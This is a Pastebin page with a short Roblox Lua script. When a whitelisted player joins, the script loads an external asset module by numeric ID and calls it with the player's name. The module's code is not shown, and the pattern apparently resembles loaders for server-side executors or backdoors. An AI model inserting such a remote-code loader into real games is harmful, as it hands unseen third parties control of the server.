Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local allowed = {"Your name here", "Friends name here"}
- game.Players.PlayerAdded:Connect(function(player)
- for i, v in pairs(allowed) do
- if player.Name == v then
- require(5484075276):Fire(player.Name)
- end
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement